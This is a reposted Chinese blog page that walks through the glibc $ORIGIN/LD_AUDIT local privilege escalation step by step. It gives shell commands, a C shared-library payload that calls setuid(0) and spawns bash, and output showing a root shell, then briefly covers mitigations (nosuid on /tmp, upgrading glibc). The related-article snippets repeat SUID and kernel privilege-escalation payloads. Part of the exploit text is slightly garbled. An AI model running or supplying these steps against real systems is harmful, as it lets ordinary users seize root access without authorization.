linux gcc++漏洞:普通用户获得root权限

最新推荐文章于 2022-03-30 23:50:44 发布
最新推荐文章于 2022-03-30 23:50:44 发布
阅读量186 收藏
点赞数
文章标签: 运维 操作系统
原文链接:http://www.cnblogs.com/woxing/p/3857420.html
版权

linux gcc++漏洞:普通用户获得root权限  

2012-02-06 10:22:38|  分类: linux安全|举报|字号 订阅

 
 

 

经我测试在RHEL5 / CentOS5 / FC13都成功了。

首先介绍下一下具体步骤中涉及到的2个频繁的出现的词语:

taviso:作者 Tavis Ormandy 的简称,Google信息安全工程师 个人微博:http://my.opera.com/taviso/blog/ http://twitter.com/taviso

 

exploit:自己创建的目录,表意漏洞利用,可以取任何名字。

原理:The GNU C library dynamic linker expands $ORIGIN in setuid library search path 详见作者博客

mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3/tmp/exploit/target
ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 ->/tmp/exploit/target*

rm -rf /tmp/exploit/

ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 ->/tmp/exploit/target (deleted)

cat > payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
^D
gcc -w -fPIC -shared -o /tmp/exploit payload.c
ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*

LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(rootgid=500(taviso)

看到了吧!是不是很恐怖。以下有2种解决办法:

1,绑定目录

需要理解一下nosuid的原理:

我的理解是:比如/etc/passwd这个文件,本来只有root有权限修改,但是用户本身也可以去修改自己的密码,这就是一种“超出它本身权限的行为”,

nosuid就是为了停止这种提升特权的办法。比如/tmp目录就有这样的权限,我们就需要对它控制。

  mount -o bind /tmp /tmp
 mount -o remount,bind,nosuid /tmp /tmp

2,升级glibc版本(红帽官方提供的解决办法)

转载于:https://www.cnblogs.com/woxing/p/3857420.html

dianchantuo7921
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
GCC编译漏洞_普通用户提权root
用法之妙,存乎一心。
09-11 5801
#!/bin/bash #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> #writer:Lin-credible #function: YOUR UID WILL BE ZERO!JUST EXEC IT! #MAIL: lin-credible@hotmail.com #<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
linux gcc 权限不够,Linux gcc++漏洞普通用户获得root权限
weixin_28481133的博客
04-29 1448
Linux gcc++漏洞普通用户获得root权限,已经在RHEL5.5 32上测试过原理:The GNU C library dynamic linker expands $ORIGIN in setuid library search path1、创建一个普通测试用户:[root@ www.linuxidc.com ~]# useradd test[root@ www.linuxidc.c...
普通用户+亲测成功】CentOS中升级gcc/g++,非root用户使用源码安装教程,附带gcc和所有依赖包的下载地址,解决库未找到的错误
Xminyang的博客
03-30 1万+
1 介绍 截止到2020年,C/C++标准多次更迭,如c++98, c++03, c++11, c++14, c++17, c++20。为了使用这些新标准,我们应根据需求来更新GCC。 本教程以非root用户使用源码安装htop 为例,安装其他tools (如CMake) 与此类似。 在Linux服务器中,非root用户所在路径,一般以./home/username开始。我们假定该用户名为user,且将htop安装在/home/user/htop目录下。 2 安装 重点在于 “--prefix=/
LINUX 普通用户提权ROOT (完整版)SHELL版首发!!!
一步一个脚印
10-12 1万+
1. 在LINUX目录下建立test 帐户2.下载 a脚本 在http://milw0rm.com/exploits/84783.查看UDEV的PID  方法一: 先cat /proc/net/netlink ffff810077587400 15  364    ffffffff 0        0        0000000000000000 2ffff810037
Linux普通用户使用强制位获取root权限
Shad0wpf的博客
12-11 741
查找存在强制位的文件 find / -perm -4000 2>/dev/null | xargs s -la 脚本编译 编写一个C脚本,内容如下: int main(void) { setuid(0); setgid(0); system("/bin/bash"); } 使用gcc编译 gcc getuid.c -o setuid #32位(报错时 apt install g...
小红帽linux密码破解,linux gcc++漏洞普通用户获得root权限
weixin_39714164的博客
05-01 2670
linux gcc++漏洞普通用户获得root权限*本内容参考自他人博客文章*Crushlinux 已经在RHEL5.5 32上测试过原理:The GNU C library dynamic linker expands $ORIGIN in setuid library search path1、创建一个普通测试用户:[root@crushlinux4 ~]# useradd test[roo...
第63天:权限提升-Linux脏牛内核漏洞&SUID&信息收集1
08-03
例如,通过`chmod u+s`赋予一个程序SUID权限,然后利用该程序的漏洞执行任意代码,从而获得root权限。 **案例3:Linux提权本地配合内核漏洞演示** 在Mozhe的案例中,提权过程涉及发现和利用内核漏洞。攻击者首先...
Linux提权思路+实战 _ Mugen1
最新发布
08-03
例如,“脏牛”(Dirty COW)是一个著名的Linux内核漏洞,允许低权限用户root权限执行代码。在寻找内核漏洞时,可以使用`searchsploit`工具查询exploit-db数据库中的相关漏洞利用代码。确定系统的发行版本和内核...
compat-libstdc++-33-3.2.3-72.el7.x86_64linux安装oracle数据库依赖包
07-06
2. **权限检查**:确保当前用户权限执行安装命令,或者使用管理员(sudo或root)身份。 3. **安装依赖**:使用RPM命令安装这个包。在终端中输入: ``` sudo rpm -ivh compat-libstdc++-33-3.2.3-72.el7.x86_64....
linux+nginx+mysql+php服务器配置(可用于工业生产).doc
06-13
这里列出了如`gcc`, `gcc-c++`, `autoconf`等基础工具,以及针对图像处理、XML解析和压缩等的库。另外,还包含了中文支持的相关包,如`fonts-chinese`,以适应可能需要处理中文内容的需求。 2. **MySQL安装** ...
Nginx+PHP+Mysql+ECShop网站部署(新).docx
04-23
4. 安装必要的编译工具,如`gcc`,`gcc-c++`,`pcre-devel`和`zlib-devel`。 5. 进入解压缩后的Nginx目录,配置编译选项,例如`--prefix=/usr/local/nginx`和`--with-http_stub_status_module`,然后运行`make`和`...
linux安全漏洞普通用户提权至root执行任意命令!
whoim_i的博客
03-17 3475
目录前言漏洞详情漏洞利用修复建议         ~~~~~~~~        因为想要面对一个新的开始,一个人必须有梦想、有希望、有对未来的憧憬。如果没有这些,就不叫新的开始,而叫逃亡。 ​​​​    ...
root用户编译安装GCC
Onwaier的博客
07-29 2732
root用户编译安装GCC
Root权限gcc(g++)的安装【Centos】
丑小鸭
03-15 9354
有些时候,实验或者项目需要特定的gcc(g++)版本,但是并没有必要将全部的环境都变为该特定的版本,且网上很多的gcc的更新教程都需要root权限,本文旨在给出非root权限下的gcc安装。 1 通过链接下载不同版本的gcc(需要的版本) 2 解压下载的压缩包(这个压缩包其实是个安装包) tar -xjvf gcc-5.3.0.tar.bz2 # 解压 tar.bz2 ---------...
root用户如何安装GCC
nie19940803的博客
10-09 2950
因工作需要,需要安装libFuzzer库,对项目做Fuzz testing。libFuzzer作为clang(llvm)的一部分,其编译需要gcc-4.8.0以上版本的支持,因此需要在编译服务器上安装4.8.0以上版本的gcc。由于没有编译服务器的root权限,因此需要将gcc安装在用户目录下。 gcc依赖三个包,分别是是mpc、gmp、mpfr,下载地址依次为: ftp://ftp.gnu.o...
服务器普通用户安装自己需要版本的gcc
WinterShiver
11-20 4246
对其他需要源码安装,且仅本用户安装的情况,是同理的。 在清华镜像下载需要的版本,比如5.5.0 解压源码tar -xvf gcc-5.5.0.tar.gz 进入gcc-5.5.0目录后./contrib/download_prerequisites 在gcc-5.5.0的平行位置建立目录,比如gcc5 进入刚建立的gcc5目录之后执行../gcc-5.5.0/configure --prefix=/home/username/.local/bin --enable-checking=release -.
CVE-2016-1240漏洞分析(Tomcat本地提权漏洞
jlvsjp的博客
10-10 6940
前几天刷Freebuf的时候发现了在国庆期间爆了一个Tomcat本地提权漏洞,乍一看漏洞利用脚本是一个shell批处理,想着也不会太难,就抱着学习的目的试着做了分析。以下是本人的分析学习总结。 0x0 漏洞描述 Debian系统的Linux上管理员通常利用apt-get进行包管理,CVE-2016-1240这一漏洞其问题出在Tomcat的deb包中,使 deb包安装的Tomcat程序会自动
CentOS下命令行实现普通用户root用户切换
热门推荐
MarkHome
03-10 5万+
CentOS下实现普通用户和管理团员权限的切换 使用su命令实现用户属性的转换 普通用户切换到root用户:方法有多重   1)su->回车->输入root密码                                        2)su -root->回车->输入root密码 root用户切换到普通用户: su    "普通用户名"
linux kernel 本地提权漏洞CVE-2013-1763 exploit 代码分析
weixin_34246551的博客
12-05 493
为什么80%的码农都做不了架构师?>>> ...
Linux下简易入门:gcc+C编译器与开发环境
本文档主要介绍了在Linux环境下使用GCC编译器进行C/C++程序开发的基础知识,以及相关的开发工具环境设置。首先,开发工具包主要包括编辑工具(如vim和emacs)、编译工具(gcc)、调试工具(gdb)以及项目管理工具...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值